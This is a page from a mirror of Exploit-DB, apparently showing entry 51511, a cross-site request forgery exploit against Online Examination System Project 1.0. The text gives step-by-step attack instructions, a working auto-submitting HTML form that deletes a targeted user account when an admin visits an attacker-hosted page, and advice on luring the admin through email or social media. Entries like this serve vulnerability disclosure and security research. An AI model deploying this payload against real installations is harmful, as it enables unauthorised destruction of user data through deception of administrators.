bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51511.txt
Exploit-DB ea8922f91d DB: 2023-06-14 
4 changes to exploits/shellcodes/ghdb

Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution

Online Examination System Project 1.0 - Cross-site request forgery (CSRF)

Sales Tracker Management System v1.0 - Multiple Vulnerabilities

Teachers Record Management System 1.0 - File Upload Type Validation
2023-06-14 00:16:24 +00:00

33 lines
No EOL
2.1 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Online Examination System Project 1.0 - Cross-site request forgery (CSRF)
# Google Dork: n/a
# Date: 09/06/2023
# Exploit Author: Ramil Mustafayev (kryptohaker)
# Vendor Homepage: https://github.com/projectworldsofficial/online-examination-systen-in-php
# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28
# CVE : n/a
Online Examination System Project <=1.0 versions (PHP/MYSQL) are vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious link that, when clicked by an admin user, will delete a user account from the database without the admins consent. This is possible because the application uses GET requests to perform account deletion and does not implement any CSRF protection mechanism. The email of the user to be deleted is passed as a parameter in the URL, which can be manipulated by the attacker. This could result in loss of data.
To exploit this vulnerability, an attacker needs to do the following:
1. Identify the URL of the target application where Online Examination System Project is installed. For example, http://example.com/
2. Identify the email address of a user account that the attacker wants to delete. For example, victim@example.com
3. Create an HTML page that contains a hidden form with the target URL and the user email as parameters. For example:
<html>
<body>
<form action="http://example.com/update.php" method="GET">
<input type="hidden" name="demail" value="victim@example.com" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
4. Host the HTML page on a server that is accessible by the admin user of the target application. For example, http://attacker.com/poc.html
5. Send the URL of the HTML page to the admin user via email, social media, or any other means.
If the admin user visits the URL of the HTML page, the script will submit the form and delete the user account associated with the email address from the database without the admins consent or knowledge.
Reference in a new issue View git blame Copy permalink